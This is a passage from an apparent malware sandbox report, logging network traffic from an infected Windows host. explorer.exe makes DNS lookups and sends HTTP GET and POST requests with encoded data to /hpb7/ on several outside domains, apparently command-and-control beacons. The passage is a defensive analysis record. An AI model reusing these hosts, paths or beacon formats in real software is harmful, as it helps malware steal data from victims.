                                                          Mar 21, 2023 08:08:36.191029072 CET804971167.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:36.191076994 CET804971167.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:36.191123009 CET804971167.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:36.191133976 CET4971180192.168.2.367.222.24.48
                                                          Mar 21, 2023 08:08:36.191169024 CET804971167.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:36.191191912 CET4971180192.168.2.367.222.24.48
                                                          Mar 21, 2023 08:08:36.191212893 CET804971167.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:36.191219091 CET4971180192.168.2.367.222.24.48
                                                          Mar 21, 2023 08:08:36.191256046 CET804971167.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:36.191299915 CET804971167.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:36.191308022 CET4971180192.168.2.367.222.24.48
                                                          Mar 21, 2023 08:08:36.191344023 CET804971167.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:36.191395044 CET4971180192.168.2.367.222.24.48
                                                          Mar 21, 2023 08:08:36.303785086 CET804971167.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:36.303868055 CET804971167.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:36.303914070 CET804971167.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:36.303960085 CET804971167.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:36.304008007 CET804971167.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:36.304044962 CET4971180192.168.2.367.222.24.48
                                                          Mar 21, 2023 08:08:36.304044962 CET4971180192.168.2.367.222.24.48
                                                          Mar 21, 2023 08:08:36.304054022 CET804971167.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:36.304105997 CET804971167.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:36.304116964 CET4971180192.168.2.367.222.24.48
                                                          Mar 21, 2023 08:08:36.304171085 CET4971180192.168.2.367.222.24.48
                                                          Mar 21, 2023 08:08:37.447019100 CET4971180192.168.2.367.222.24.48
                                                          Mar 21, 2023 08:08:38.462282896 CET4971280192.168.2.367.222.24.48
                                                          Mar 21, 2023 08:08:38.574790955 CET804971267.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:38.576627970 CET4971280192.168.2.367.222.24.48
                                                          Mar 21, 2023 08:08:38.577159882 CET4971280192.168.2.367.222.24.48
                                                          Mar 21, 2023 08:08:38.689446926 CET804971267.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:38.689528942 CET804971267.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:38.689738989 CET804971267.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:38.834908009 CET804971267.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:38.835011959 CET804971267.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:38.835052013 CET804971267.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:38.835092068 CET804971267.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:38.835135937 CET804971267.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:38.835176945 CET804971267.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:38.835191965 CET4971280192.168.2.367.222.24.48
                                                          Mar 21, 2023 08:08:38.835215092 CET804971267.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:38.835254908 CET804971267.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:38.835294962 CET804971267.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:38.835298061 CET4971280192.168.2.367.222.24.48
                                                          Mar 21, 2023 08:08:38.835335016 CET804971267.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:38.835369110 CET4971280192.168.2.367.222.24.48
                                                          Mar 21, 2023 08:08:38.835370064 CET804971267.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:38.835426092 CET4971280192.168.2.367.222.24.48
                                                          Mar 21, 2023 08:08:38.947520018 CET804971267.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:38.947562933 CET804971267.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:38.947597027 CET804971267.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:38.947705030 CET804971267.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:41.103446007 CET4971380192.168.2.367.222.24.48
                                                          Mar 21, 2023 08:08:41.216063976 CET804971367.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:41.218194008 CET4971380192.168.2.367.222.24.48
                                                          Mar 21, 2023 08:08:41.218318939 CET4971380192.168.2.367.222.24.48
                                                          Mar 21, 2023 08:08:41.330509901 CET804971367.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:41.410840988 CET804971367.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:41.410985947 CET804971367.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:41.411097050 CET4971380192.168.2.367.222.24.48
                                                          Mar 21, 2023 08:08:41.411199093 CET4971380192.168.2.367.222.24.48
                                                          Mar 21, 2023 08:08:41.523447037 CET804971367.222.24.48192.168.2.3
                                                          Mar 21, 2023 08:08:48.943914890 CET4971480192.168.2.349.212.180.95
                                                          Mar 21, 2023 08:08:49.243119001 CET804971449.212.180.95192.168.2.3
                                                          Mar 21, 2023 08:08:49.243268013 CET4971480192.168.2.349.212.180.95
                                                          Mar 21, 2023 08:08:49.243649960 CET4971480192.168.2.349.212.180.95
                                                          Mar 21, 2023 08:08:49.542366028 CET804971449.212.180.95192.168.2.3
                                                          Mar 21, 2023 08:08:49.543113947 CET804971449.212.180.95192.168.2.3
                                                          Mar 21, 2023 08:08:49.543159008 CET804971449.212.180.95192.168.2.3
                                                          Mar 21, 2023 08:08:49.543302059 CET4971480192.168.2.349.212.180.95
                                                          Mar 21, 2023 08:08:50.744518042 CET4971480192.168.2.349.212.180.95
                                                          Mar 21, 2023 08:08:51.760823965 CET4971580192.168.2.349.212.180.95
                                                          Mar 21, 2023 08:08:52.061233044 CET804971549.212.180.95192.168.2.3
                                                          Mar 21, 2023 08:08:52.061520100 CET4971580192.168.2.349.212.180.95
                                                          Mar 21, 2023 08:08:52.062103033 CET4971580192.168.2.349.212.180.95
                                                          Mar 21, 2023 08:08:52.361815929 CET804971549.212.180.95192.168.2.3
                                                          Mar 21, 2023 08:08:52.362030983 CET804971549.212.180.95192.168.2.3
                                                          Mar 21, 2023 08:08:52.362059116 CET804971549.212.180.95192.168.2.3
                                                          Mar 21, 2023 08:08:52.362633944 CET804971549.212.180.95192.168.2.3
                                                          Mar 21, 2023 08:08:52.362653971 CET804971549.212.180.95192.168.2.3
                                                          Mar 21, 2023 08:08:52.362792015 CET4971580192.168.2.349.212.180.95
                                                          Mar 21, 2023 08:08:53.829648018 CET4971580192.168.2.349.212.180.95
                                                          Mar 21, 2023 08:08:55.271346092 CET4971680192.168.2.349.212.180.95
                                                          Mar 21, 2023 08:08:55.578509092 CET804971649.212.180.95192.168.2.3
                                                          Mar 21, 2023 08:08:55.578702927 CET4971680192.168.2.349.212.180.95
                                                          Mar 21, 2023 08:08:55.578836918 CET4971680192.168.2.349.212.180.95
                                                          Mar 21, 2023 08:08:55.886533976 CET804971649.212.180.95192.168.2.3
                                                          Mar 21, 2023 08:08:55.886961937 CET804971649.212.180.95192.168.2.3
                                                          Mar 21, 2023 08:08:55.886987925 CET804971649.212.180.95192.168.2.3
                                                          Mar 21, 2023 08:08:55.887145996 CET4971680192.168.2.349.212.180.95
                                                          Mar 21, 2023 08:08:55.887325048 CET4971680192.168.2.349.212.180.95
                                                          Mar 21, 2023 08:08:56.194353104 CET804971649.212.180.95192.168.2.3

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Mar 21, 2023 08:07:24.608470917 CET6270453192.168.2.38.8.8.8
                                                          Mar 21, 2023 08:07:24.629987955 CET53627048.8.8.8192.168.2.3
                                                          Mar 21, 2023 08:07:35.665481091 CET4997753192.168.2.38.8.8.8
                                                          Mar 21, 2023 08:07:35.687676907 CET53499778.8.8.8192.168.2.3
                                                          Mar 21, 2023 08:07:46.422673941 CET5784053192.168.2.38.8.8.8
                                                          Mar 21, 2023 08:07:46.707103968 CET53578408.8.8.8192.168.2.3
                                                          Mar 21, 2023 08:07:58.808130026 CET5799053192.168.2.38.8.8.8
                                                          Mar 21, 2023 08:07:58.829898119 CET53579908.8.8.8192.168.2.3
                                                          Mar 21, 2023 08:07:59.838872910 CET5238753192.168.2.38.8.8.8
                                                          Mar 21, 2023 08:07:59.860487938 CET53523878.8.8.8192.168.2.3
                                                          Mar 21, 2023 08:08:00.867115974 CET5692453192.168.2.38.8.8.8
                                                          Mar 21, 2023 08:08:00.889214993 CET53569248.8.8.8192.168.2.3
                                                          Mar 21, 2023 08:08:05.917721033 CET6062553192.168.2.38.8.8.8
                                                          Mar 21, 2023 08:08:06.065783024 CET53606258.8.8.8192.168.2.3
                                                          Mar 21, 2023 08:08:07.086607933 CET4930253192.168.2.38.8.8.8
                                                          Mar 21, 2023 08:08:07.286751986 CET53493028.8.8.8192.168.2.3
                                                          Mar 21, 2023 08:08:08.308490992 CET5397553192.168.2.38.8.8.8
                                                          Mar 21, 2023 08:08:08.328178883 CET53539758.8.8.8192.168.2.3
                                                          Mar 21, 2023 08:08:13.337563992 CET5113953192.168.2.38.8.8.8
                                                          Mar 21, 2023 08:08:13.699300051 CET53511398.8.8.8192.168.2.3
                                                          Mar 21, 2023 08:08:24.633847952 CET5295553192.168.2.38.8.8.8
                                                          Mar 21, 2023 08:08:24.783422947 CET53529558.8.8.8192.168.2.3
                                                          Mar 21, 2023 08:08:35.742198944 CET6058253192.168.2.38.8.8.8
                                                          Mar 21, 2023 08:08:35.790923119 CET53605828.8.8.8192.168.2.3
                                                          Mar 21, 2023 08:08:48.652827978 CET5713453192.168.2.38.8.8.8
                                                          Mar 21, 2023 08:08:48.940431118 CET53571348.8.8.8192.168.2.3
                                                          Mar 21, 2023 08:09:08.449750900 CET6205053192.168.2.38.8.8.8
                                                          Mar 21, 2023 08:09:08.493007898 CET53620508.8.8.8192.168.2.3

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Mar 21, 2023 08:07:24.608470917 CET192.168.2.38.8.8.80x3abbStandard query (0)www.yongleproducts.comA (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:07:35.665481091 CET192.168.2.38.8.8.80xae75Standard query (0)www.0dhy.xyzA (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:07:46.422673941 CET192.168.2.38.8.8.80x93efStandard query (0)www.kunimi.orgA (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:07:58.808130026 CET192.168.2.38.8.8.80x395aStandard query (0)www.amirah.cfdA (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:07:59.838872910 CET192.168.2.38.8.8.80x60d8Standard query (0)www.amirah.cfdA (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:08:00.867115974 CET192.168.2.38.8.8.80x1705Standard query (0)www.amirah.cfdA (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:08:05.917721033 CET192.168.2.38.8.8.80xd3d2Standard query (0)www.bisarropainting.comA (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:08:07.086607933 CET192.168.2.38.8.8.80x1bc0Standard query (0)www.bisarropainting.comA (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:08:08.308490992 CET192.168.2.38.8.8.80x2433Standard query (0)www.bisarropainting.comA (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:08:13.337563992 CET192.168.2.38.8.8.80x26afStandard query (0)www.traindic.topA (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:08:24.633847952 CET192.168.2.38.8.8.80x2381Standard query (0)www.bohndigitaltech.comA (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:08:35.742198944 CET192.168.2.38.8.8.80xd55eStandard query (0)www.rifleroofers.comA (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:08:48.652827978 CET192.168.2.38.8.8.80x5b9eStandard query (0)www.denko-kosan.comA (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:09:08.449750900 CET192.168.2.38.8.8.80xb9d5Standard query (0)www.madliainsalu.comA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Mar 21, 2023 08:06:50.276381016 CET8.8.8.8192.168.2.30x2211No error (0)windowsupdatebg.s.llnwi.net95.140.230.128A (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:07:24.629987955 CET8.8.8.8192.168.2.30x3abbNo error (0)www.yongleproducts.com1.13.186.125A (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:07:35.687676907 CET8.8.8.8192.168.2.30xae75No error (0)www.0dhy.xyz198.46.160.97A (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:07:46.707103968 CET8.8.8.8192.168.2.30x93efNo error (0)www.kunimi.orgkunimi.orgCNAME (Canonical name)IN (0x0001)false
                                                          Mar 21, 2023 08:07:46.707103968 CET8.8.8.8192.168.2.30x93efNo error (0)kunimi.org219.94.129.181A (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:07:58.829898119 CET8.8.8.8192.168.2.30x395aName error (3)www.amirah.cfdnonenoneA (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:07:59.860487938 CET8.8.8.8192.168.2.30x60d8Name error (3)www.amirah.cfdnonenoneA (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:08:00.889214993 CET8.8.8.8192.168.2.30x1705Name error (3)www.amirah.cfdnonenoneA (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:08:06.065783024 CET8.8.8.8192.168.2.30xd3d2Name error (3)www.bisarropainting.comnonenoneA (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:08:07.286751986 CET8.8.8.8192.168.2.30x1bc0Name error (3)www.bisarropainting.comnonenoneA (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:08:08.328178883 CET8.8.8.8192.168.2.30x2433Name error (3)www.bisarropainting.comnonenoneA (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:08:13.699300051 CET8.8.8.8192.168.2.30x26afNo error (0)www.traindic.top162.0.231.77A (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:08:24.783422947 CET8.8.8.8192.168.2.30x2381No error (0)www.bohndigitaltech.combohndigitaltech.comCNAME (Canonical name)IN (0x0001)false
                                                          Mar 21, 2023 08:08:24.783422947 CET8.8.8.8192.168.2.30x2381No error (0)bohndigitaltech.com162.241.24.110A (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:08:35.790923119 CET8.8.8.8192.168.2.30xd55eNo error (0)www.rifleroofers.comrifleroofers.comCNAME (Canonical name)IN (0x0001)false
                                                          Mar 21, 2023 08:08:35.790923119 CET8.8.8.8192.168.2.30xd55eNo error (0)rifleroofers.com67.222.24.48A (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:08:48.940431118 CET8.8.8.8192.168.2.30x5b9eNo error (0)www.denko-kosan.comdenko-kosan.comCNAME (Canonical name)IN (0x0001)false
                                                          Mar 21, 2023 08:08:48.940431118 CET8.8.8.8192.168.2.30x5b9eNo error (0)denko-kosan.com49.212.180.95A (IP address)IN (0x0001)false
                                                          Mar 21, 2023 08:09:08.493007898 CET8.8.8.8192.168.2.30xb9d5No error (0)www.madliainsalu.commadliainsalu.comCNAME (Canonical name)IN (0x0001)false
                                                          Mar 21, 2023 08:09:08.493007898 CET8.8.8.8192.168.2.30xb9d5No error (0)madliainsalu.com34.120.137.41A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • www.yongleproducts.com
                                                          • www.0dhy.xyz
                                                          • www.kunimi.org
                                                          • www.traindic.top
                                                          • www.bohndigitaltech.com
                                                          • www.rifleroofers.com
                                                          • www.denko-kosan.com

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.2.3496981.13.186.12580C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Mar 21, 2023 08:07:24.914344072 CET246OUTGET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=qNzMMFnF92wYqby+PK0Ez7hJYWSZzqH1hiqfKssSJUPL9XRjbsSUYneeVaUFujlDIgVdAeBkPDqj9kdbdEfqEoULBaI9U5csBw== HTTP/1.1
                                                          Host: www.yongleproducts.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Mar 21, 2023 08:07:25.192853928 CET246INHTTP/1.1 404 Not Found
                                                          Transfer-Encoding: chunked
                                                          Server: Microsoft-IIS/8.5
                                                          Date: Tue, 21 Mar 2023 07:07:25 GMT
                                                          Connection: close
                                                          Mar 21, 2023 08:07:25.192886114 CET246INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          1192.168.2.349699198.46.160.9780C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Mar 21, 2023 08:07:35.808631897 CET247OUTPOST /hpb7/ HTTP/1.1
                                                          Host: www.0dhy.xyz
                                                          Connection: close
                                                          Content-Length: 188
                                                          Cache-Control: no-cache
                                                          Origin: http://www.0dhy.xyz
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://www.0dhy.xyz/hpb7/
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Data Raw: 62 63 58 33 55 76 3d 4d 70 4e 34 42 63 49 58 75 59 58 5a 77 34 31 77 37 77 71 4f 75 56 79 4f 63 53 76 5a 30 49 66 59 78 2d 70 50 78 5a 68 48 62 47 61 6f 7e 51 42 63 44 6c 76 79 4b 51 63 49 78 50 6f 46 46 30 39 36 71 5a 47 53 77 6f 59 68 37 39 51 63 61 42 76 41 61 53 75 78 5a 6f 4d 4e 65 53 4b 5a 68 6f 6f 34 35 59 5a 43 4a 39 28 54 6b 54 4c 35 36 74 50 34 7a 43 37 56 71 6b 56 4b 6b 65 67 46 30 53 75 6e 62 71 4f 49 75 5f 46 45 4d 6f 6c 6f 51 57 47 74 4d 36 4f 37 78 36 32 50 53 4a 54 78 37 45 7a 6b 54 31 72 78 72 36 63 72 6e 73 31 52 5a 30 76 59 61 77 29 2e 00 00 00 00 00 00 00 00
                                                          Data Ascii: bcX3Uv=MpN4BcIXuYXZw41w7wqOuVyOcSvZ0IfYx-pPxZhHbGao~QBcDlvyKQcIxPoFF096qZGSwoYh79QcaBvAaSuxZoMNeSKZhoo45YZCJ9(TkTL56tP4zC7VqkVKkegF0SunbqOIu_FEMoloQWGtM6O7x62PSJTx7EzkT1rxr6crns1RZ0vYaw).
                                                          Mar 21, 2023 08:07:35.927187920 CET248INHTTP/1.1 400 Bad Request
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Tue, 21 Mar 2023 07:07:35 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 264
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 63 65 6e 74 65 72 3e 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 The plain HTTP request was sent to HTTPS port</title></head><body><center><h1>400 Bad Request</h1></center><center>The plain HTTP request was sent to HTTPS port</center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          10192.168.2.349708162.241.24.11080C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Mar 21, 2023 08:08:24.968077898 CET478OUTPOST /hpb7/ HTTP/1.1
                                                          Host: www.bohndigitaltech.com
                                                          Connection: close
                                                          Content-Length: 188
                                                          Cache-Control: no-cache
                                                          Origin: http://www.bohndigitaltech.com
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://www.bohndigitaltech.com/hpb7/
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Data Raw: 62 63 58 33 55 76 3d 7a 53 73 47 64 67 61 39 61 6c 39 6c 52 4d 7e 6c 75 5a 74 42 55 30 74 5a 45 4d 79 6d 4b 4f 30 68 77 51 53 57 31 66 6e 63 56 41 72 65 61 2d 32 78 6e 39 28 66 37 4e 59 68 6e 47 37 45 4c 4a 6a 42 65 53 72 39 41 33 6a 4d 51 54 7a 53 5a 59 4b 4b 6f 56 73 69 32 79 57 54 4c 45 59 72 66 67 64 70 62 63 48 50 79 44 72 4c 61 43 73 30 64 6b 28 51 4a 6c 47 55 28 34 49 64 5a 37 67 30 76 66 6e 76 67 59 5a 44 33 39 51 35 43 46 6b 50 44 79 31 6f 50 57 39 37 4d 5f 38 73 34 4c 33 37 4c 53 50 43 62 67 59 38 55 71 66 5a 46 33 5a 32 67 56 30 71 61 41 29 2e 00 00 00 00 00 00 00 00
                                                          Data Ascii: bcX3Uv=zSsGdga9al9lRM~luZtBU0tZEMymKO0hwQSW1fncVArea-2xn9(f7NYhnG7ELJjBeSr9A3jMQTzSZYKKoVsi2yWTLEYrfgdpbcHPyDrLaCs0dk(QJlGU(4IdZ7g0vfnvgYZD39Q5CFkPDy1oPW97M_8s4L37LSPCbgY8UqfZF3Z2gV0qaA).
                                                          Mar 21, 2023 08:08:25.161900043 CET479INHTTP/1.1 404 Not Found
                                                          Date: Tue, 21 Mar 2023 07:08:25 GMT
                                                          Server: Apache
                                                          Content-Length: 315
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          11192.168.2.349709162.241.24.11080C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Mar 21, 2023 08:08:27.673937082 CET485OUTPOST /hpb7/ HTTP/1.1
                                                          Host: www.bohndigitaltech.com
                                                          Connection: close
                                                          Content-Length: 5336
                                                          Cache-Control: no-cache
                                                          Origin: http://www.bohndigitaltech.com
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://www.bohndigitaltech.com/hpb7/
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Data Raw: 62 63 58 33 55 76 3d 7a 53 73 47 64 67 61 39 61 6c 39 6c 44 5f 57 6c 6a 61 46 42 63 30 74 61 4c 73 79 6d 45 65 30 62 77 51 65 57 31 65 6a 4d 56 53 48 65 66 39 4f 78 6e 66 58 66 35 4e 59 68 76 6d 37 41 47 70 6a 74 65 53 76 78 41 79 66 63 51 57 4c 53 5a 4b 43 4b 34 46 73 68 36 79 57 57 4d 45 59 6f 43 51 64 70 62 63 4c 54 79 43 72 39 61 43 6b 30 64 33 6e 51 4a 6e 7e 58 35 6f 49 63 42 4c 67 30 76 66 62 67 67 59 5a 31 33 2d 68 2d 43 45 45 50 43 67 74 6f 44 6e 39 34 43 5f 38 76 37 4c 32 4f 49 42 57 64 5a 69 49 67 47 71 33 6c 45 7a 78 34 6b 46 59 6d 4e 75 54 47 4e 76 74 4d 43 45 44 52 35 44 47 49 52 4c 4f 52 41 33 4f 75 57 78 6b 5f 57 6d 39 58 6b 59 62 50 49 42 4d 41 45 6f 4a 30 75 54 69 49 6e 6b 37 58 36 4e 48 59 42 4c 4a 56 51 6e 32 35 6c 78 55 79 28 72 51 42 6b 44 6b 69 51 49 52 67 75 58 71 59 76 74 4c 36 6a 69 74 75 31 30 55 58 78 6d 35 46 51 47 77 47 62 61 42 59 34 58 6d 73 67 42 47 63 50 44 69 4a 35 55 52 4a 64 34 73 49 6d 78 65 4a 43 53 68 2d 7e 58 76 59 39 78 56 45 41 74 6a 54 55 73 36 31 28 5f 4b 6e 78 37 76 30 64 4b 78 75 35 57 43 42 61 6d 6b 5a 50 62 41 2d 75 65 68 71 71 54 57 59 51 77 61 67 4c 6c 73 49 63 43 64 31 52 74 77 64 72 69 47 46 4c 37 43 77 34 31 64 45 4e 31 6e 44 59 53 74 6a 44 71 37 50 6e 74 4c 78 73 4c 5a 30 39 76 4c 6f 69 69 4d 71 56 56 44 35 58 75 38 4a 43 6f 43 53 32 47 74 57 38 35 59 59 35 30 43 78 56 6d 75 6f 37 71 68 78 74 47 47 4c 4c 39 53 6d 65 65 6c 32 4d 4b 6d 34 6c 74 49 48 65 4b 55 4a 62 53 68 59 4c 66 37 41 44 45 54 4c 70 45 35 5f 77 35 51 35 28 4a 47 44 50 46 4f 45 56 49 4e 54 79 54 4f 30 52 2d 38 4a 77 69 6f 6a 42 30 71 43 55 38 36 46 4a 5f 72 62 4f 7a 6d 65 79 66 47 79 6d 69 6c 52 61 6d 6b 6a 4a 34 52 47 74 69 74 4c 63 47 6b 4f 36 38 39 43 78 48 62 54 64 42 4b 4e 65 62 4b 47 75 30 72 6b 6c 57 78 69 77 6a 4f 36 31 5f 35 38 64 42 52 2d 4f 5a 41 39 33 4e 78 4e 58 39 46 6d 6a 57 77 39 4f 51 4a 78 58 65 63 73 71 6f 59 76 4c 6f 79 49 43 4f 28 6d 30 4e 47 63 4b 38 69 44 28 39 42 76 7e 57 62 43 6f 52 6e 53 34 47 44 44 78 56 6d 6b 4c 51 59 68 4f 5f 50 32 42 68 31 4b 7a 43 72 76 4b 65 52 32 4b 33 38 38 75 32 66 6f 4b 7a 38 74 6c 78 36 4d 38 76 44 6e 66 72 48 67 4b 69 65 31 48 4e 4d 7a 70 61 66 6b 49 72 4d 58 54 4f 35 52 33 48 62 6f 32 73 59 45 45 39 32 6c 74 54 7e 37 53 4a 6b 35 45 71 58 56 61 78 7e 47 7e 66 41 64 74 37 6d 33 39 42 6a 30 6f 78 54 69 47 61 72 6b 68 57 42 7a 66 6b 7e 4d 6b 4b 4b 4c 6b 45 35 62 42 7a 75 36 39 6c 34 47 58 47 73 69 67 77 68 56 32 64 42 4c 56 39 55 5a 79 37 56 5f 41 6c 48 6e 62 67 56 58 66 5f 35 38 53 6d 45 64 36 58 42 30 7a 65 6f 63 79 78 54 67 50 69 73 72 56 4b 64 51 28 64 35 45 50 37 66 33 77 58 6f 4c 4e 71 74 6b 36 69 73 4e 35 51 74 48 75 5a 61 31 6c 43 78 62 41 5a 5a 4f 28 65 33 74 7a 45 33 6a 42 6e 78 30 72 4a 62 6d 43 